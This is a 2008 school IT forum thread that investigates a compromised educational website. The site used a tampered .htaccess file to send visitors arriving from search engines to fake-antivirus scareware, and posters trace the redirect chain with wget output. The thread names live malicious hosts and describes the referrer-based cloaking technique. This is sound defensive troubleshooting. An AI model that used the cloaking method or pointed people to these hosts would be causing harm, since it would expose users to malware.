+ Post New Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 26
General Chat Thread, Virus Hunting Needle-In-A-Haystack in General; DISCLAIMER DO NOT CLICK LINKS IN THIS THREAD UNLESS YOU'RE SURE YOU'RE TESTING IN A 100% SAFE ENVIRONMENT! With that ...
  1. #1
    Friez's Avatar
    Join Date
    Dec 2006
    Posts
    839
    Thank Post
    22
    Thanked 22 Times in 21 Posts
    Rep Power
    24

    Virus Hunting Needle-In-A-Haystack

    DISCLAIMER
    DO NOT CLICK LINKS IN THIS THREAD UNLESS YOU'RE SURE YOU'RE TESTING IN A 100% SAFE ENVIRONMENT!

    With that over...

    Here is a pure funky issue we've come across and we would like your assistance please (although please be careful!)

    We had a report that our students were going to a legitimate school resource website and were instead being redirected to that nasty XP-Antivirus 2009 virus website.

    So off we go and dutifully investigate.

    The website we were going to is:
    (DISABLED TO PREVENT CLICK)
    www(DOT)sense-lang(DOT)org/typing/

    If we enter the URL in the web browser directly, it goes through to the site just fine. However, if we go to google.com and search for "sense lang" and click the link there we get redirected to the antivirus-virus site.

    It redirects to antivirusonlivescan.com DANGER! - Browsing to this page may infect!

    Now, we were thinking at first it was a DNS attack, but no! If it was, it would surely go to the wrong site if we typed the url straight.

    So it must be something with the link. Google itself actually links straight to the site, and the site seems clean when directly going there. The URL in the bar actually changes which indicates it's not a DNS attack. It's very odd.

    Even more strange is that if we go unfiltered, we don't suffer this problem.

    This made us think it was a problem with one of our proxies/filters.

    There are two proxies/filters in our path:

    { Internet } -> SWGfL Proxies (staffproxy.swgfl.org.uk / proxy.swgfl.org.uk) -> Smoothwall -> { Us }

    We connected via both the staffproxy and the standard proxy and eliminated Smoothwall from the equation (as we were still having the problem if we were on the SWGfL proxies).

    To me, it seems like something has hijacked the SWGfL proxy. We tried a few other search engines, and made our own web-page which linked to sense-lang and some of these were safe.

    Our own link was clean, as was live.com and a few minor search engines. But using yahoo, altavista or ask.com returned virii infected links.

    If anyones brave enough to set themselves up a virtual machine session and test with proxies (even better if you're on the SWGfL) to see if you also suffer the same conditions to get erroneously linked off to said virus site.

    I for one am totally baffled as to how the redirect is happening.

    As for our machines, they're clean and have nod32 installed. We also deny exe files from being downloaded from every proxy in the pipeline. We are certain there isn't another virus sitting at our end.

    I'll be interested in peoples results, and please be careful!

    Thanks!
    Last edited by ZeroHour; 12th November 2008 at 04:22 PM. Reason: borking the link to prevent accidents - ZH

  2. #2

    Geoff's Avatar
    Join Date
    Jun 2005
    Location
    Fylde, Lancs, UK.
    Posts
    11,850
    Thank Post
    110
    Thanked 598 Times in 514 Posts
    Blog Entries
    1
    Rep Power
    227
    The Google result is redirecting to
    Code:
    http://89.28.13.202/in.html?s=ix
    not the sense-lang.org site.

  3. #3

    Geoff's Avatar
    Join Date
    Jun 2005
    Location
    Fylde, Lancs, UK.
    Posts
    11,850
    Thank Post
    110
    Thanked 598 Times in 514 Posts
    Blog Entries
    1
    Rep Power
    227
    If you whois the IP you find that it belongs to an ISP called STAR in Moldovia. Therefore it's likely a compromised machine hanging off a broadband connection.

    http://www.db.ripe.net/whois?form_ty..._search=Search

  4. #4

    Geoff's Avatar
    Join Date
    Jun 2005
    Location
    Fylde, Lancs, UK.
    Posts
    11,850
    Thank Post
    110
    Thanked 598 Times in 514 Posts
    Blog Entries
    1
    Rep Power
    227
    I've put the ip in the siteadvisor queue.

    89.28.13.202 | Web Safety Ratings from McAfee SiteAdvisor

    That'll work out how nasty it is.

  5. #5
    Friez's Avatar
    Join Date
    Dec 2006
    Posts
    839
    Thank Post
    22
    Thanked 22 Times in 21 Posts
    Rep Power
    24
    Good finds, still confused as to how the search engines are linking the hi-jacked connection/virus but totally displaying info regarding the genuine site right down to the url you link to instead... Plus now we get inconsistent results with being through a proxy or not, so I'm not convinced the proxy has any bearing on it at all.

    Sometimes we get through to the proper website via clicking a google link, but we ALWAYS get through to the proper site by putting it into the web-address bar.

    What's more funky is to view the google cache, looks like executable code!

  6. #6

    Join Date
    Feb 2006
    Location
    Derbyshire
    Posts
    1,381
    Thank Post
    181
    Thanked 211 Times in 171 Posts
    Rep Power
    66
    I'm using an unproxied direct link here on what I believe(!) is a clean machine. If I use your query of "Sense lang" and click the result link in Google, I get the redirect - however what is odd is that if I right click the link and copy/paste to the URL bar, I get http://sense-lang.org/typing/ - which is correct. If I then hit enter, it works and displays the correct website.

    It seems like the "Sense lang" website has been compromised in some way - look at the following wget. First one uses no referrer - same as typing into the URL bar or copying and pasting the link.

    Code:
    >wget "http://sense-lang.org/typing/"
    --12:24:37--  http://sense-lang.org/typing/
    Resolving sense-lang.org... 71.18.63.16
    Connecting to sense-lang.org|71.18.63.16|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 31718 (31K) [text/html]
    Saving to: `index.html'
    
    100%[=======================================>] 31,718      36.1K/s   in 0.9s
    
    12:24:39 (36.1 KB/s) - `index.html' saved [31718/31718]
    Code:
    >wget --referer=http://www.google.com http://sense-lang.org/typing/
    --12:25:35--  http://sense-lang.org/typing/
    Resolving sense-lang.org... 71.18.63.16
    Connecting to sense-lang.org|71.18.63.16|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: http://89.28.13.202/in.html?s=ix [following]
    --12:25:35--  http://89.28.13.202/in.html?s=ix
    Connecting to 89.28.13.202:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: http://viewallclicks.com/soft.php?aid=0147&d=6&product=XPA&refer=bb1f0
    c2b3 [following]
    --12:25:36--  http://viewallclicks.com/soft.php?aid=0147&d=6&product=XPA&refer=b
    b1f0c2b3
    Resolving viewallclicks.com... 89.149.227.232
    Connecting to viewallclicks.com|89.149.227.232|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: http://proffesional-scan.com/2009/1/freescan.php?nu=880147 [following]
    
    --12:25:36--  http://proffesional-scan.com/2009/1/freescan.php?nu=880147
    Resolving proffesional-scan.com... 89.149.253.215, 78.159.118.217
    Connecting to proffesional-scan.com|89.149.253.215|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: en/freescan.php?id=880147 [following]
    --12:25:36--  http://proffesional-scan.com/2009/1/en/freescan.php?id=880147
    Reusing existing connection to proffesional-scan.com:80.
    HTTP request sent, awaiting response... 200 OK
    Length: 1386 (1.4K) [text/html]
    Saving to: `freescan.php@id=880147'
    
    100%[=======================================>] 1,386       --.-K/s   in 0s
    
    12:25:36 (46.8 MB/s) - `freescan.php@id=880147' saved [1386/1386]
    That result is consistent/repeatable.

    Trying to grab the 89.28.13.202/in.html file without a parameter gets you a 302 back to Google. Clever.
    Last edited by OutToLunch; 12th November 2008 at 01:31 PM.

  7. 2 Thanks to OutToLunch:

    Friez (12th November 2008), ZeroHour (12th November 2008)

  8. #7
    Friez's Avatar
    Join Date
    Dec 2006
    Posts
    839
    Thank Post
    22
    Thanked 22 Times in 21 Posts
    Rep Power
    24
    That's very interesting indeed! And it must be picking up specific referrers too, as we've clicked through on some other search engines and it's a-ok.

  9. #8

    Hightower's Avatar
    Join Date
    Jun 2008
    Location
    Cloud 9
    Posts
    4,920
    Thank Post
    494
    Thanked 690 Times in 444 Posts
    Rep Power
    242
    If you own a site you don't Google it. Therefore when you type in the address www.website.com (of your site) you get through to it fine.

    When other users want to find it they Google it and get a virus.

    It's a very clever ploy that can hand a virus to lots of users but when the admin gets reports and types in his web address he doesnt see anything wrong.

  10. Thanks to Hightower from:

    Friez (12th November 2008)

  11. #9

    Geoff's Avatar
    Join Date
    Jun 2005
    Location
    Fylde, Lancs, UK.
    Posts
    11,850
    Thank Post
    110
    Thanked 598 Times in 514 Posts
    Blog Entries
    1
    Rep Power
    227
    Leads back to a russian spyware site in the end anyway. I agree. The sense-lang.org site has been compromised.

  12. Thanks to Geoff from:

    Friez (12th November 2008)

  13. #10
    Friez's Avatar
    Join Date
    Dec 2006
    Posts
    839
    Thank Post
    22
    Thanked 22 Times in 21 Posts
    Rep Power
    24
    Thanks for the research, quite a sneaky one too. Definitely one to look out for, especially with the number of students/teachers that can't follow instruction and put URL's straight into google.

  14. #11

    ZeroHour's Avatar
    Join Date
    Dec 2005
    Location
    Edinburgh, Scotland
    Posts
    5,837
    Thank Post
    974
    Thanked 1,405 Times in 850 Posts
    Blog Entries
    1
    Rep Power
    460
    Very useful to know, ncie work all. They get smarter all the time
    I have moved this to security as it seems more relevant there.

    +rep for reporting it

  15. #12

    Join Date
    Nov 2008
    Location
    USA
    Posts
    4
    Thank Post
    0
    Thanked 1 Time in 1 Post
    Rep Power
    0

    Check .htaccess

    I discovered earlier this morning that the same thing was happening with my web site. Viewing any of my URLs directly worked fine, but any referrals to my site from Google were instead getting sent to http://89[DOT]28[DOT]13[DOT]202/in.html?s=ix

    I checked a number of complex possibilities, searching for an answer, without success. Then I decided to check a simple answer -- I checked my web site's root directory to see if someone had planted a rogue file in there.

    I immediately discovered that my .htaccess file had been modified -- by someone other than me -- and replaced with code that sent any referrals from the major search engines to the URL above.

    I'm not sure how someone was able to replace my .htaccess file with their own code, but that's what happened. Naturally I've now removed their "pirate code" and put my own .htaccess file back in place. Now Google referrals are working properly.

  16. #13

    dhicks's Avatar
    Join Date
    Aug 2005
    Location
    Knightsbridge
    Posts
    5,772
    Thank Post
    1,308
    Thanked 804 Times in 698 Posts
    Rep Power
    246
    Quote Originally Posted by Friez View Post
    that nasty XP-Antivirus 2009 virus website.
    There's an article about this in this month's PC Pro, with quite a detailed explanation of how it works. One phrase mentioned was "drive-by download". I assume this shouldn't be a problem with a decent, recently patched web browser, but could it be that Internet Explorer still has some vulnerabilities?

    --
    David Hicks

  17. #14

    ZeroHour's Avatar
    Join Date
    Dec 2005
    Location
    Edinburgh, Scotland
    Posts
    5,837
    Thank Post
    974
    Thanked 1,405 Times in 850 Posts
    Blog Entries
    1
    Rep Power
    460
    Quote Originally Posted by WavMaker View Post
    I discovered earlier this morning that the same thing was happening with my web site. Viewing any of my URLs directly worked fine, but any referrals to my site from Google were instead getting sent to http://89[DOT]28[DOT]13[DOT]202/in.html?s=ix

    I checked a number of complex possibilities, searching for an answer, without success. Then I decided to check a simple answer -- I checked my web site's root directory to see if someone had planted a rogue file in there.

    I immediately discovered that my .htaccess file had been modified -- by someone other than me -- and replaced with code that sent any referrals from the major search engines to the URL above.

    I'm not sure how someone was able to replace my .htaccess file with their own code, but that's what happened. Naturally I've now removed their "pirate code" and put my own .htaccess file back in place. Now Google referrals are working properly.
    What version of apache are you running and on what os?
    It would be good to know why you were hacked to warn others. Thanks for the post and welcome to EduGeek as well

  18. #15

    Join Date
    Nov 2008
    Location
    USA
    Posts
    4
    Thank Post
    0
    Thanked 1 Time in 1 Post
    Rep Power
    0
    My site is hosted at IXwebhosting.com. I've seen posts from other IX clients that their sites are being attacked the same way. The rogue .htaccess file is being uploaded via FTP. I've changed my FTP password.

    I'm on a Linux server with Apache - 1.3.31

  19. Thanks to WavMaker from:

    ZeroHour (12th November 2008)



SHARE:
+ Post New Thread
Page 1 of 2 12 LastLast

Similar Threads

  1. New Virus?
    By apeo in forum Windows
    Replies: 8
    Last Post: 10th October 2008, 02:12 PM
  2. Job Hunting Survey - Please Help
    By SpecialAgent in forum Educational IT Jobs
    Replies: 11
    Last Post: 3rd April 2008, 08:09 PM
  3. Website Virus
    By karldenton in forum Web Development
    Replies: 6
    Last Post: 21st November 2007, 12:56 PM
  4. Virus Question
    By jlr58 in forum Windows
    Replies: 2
    Last Post: 27th June 2007, 09:06 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •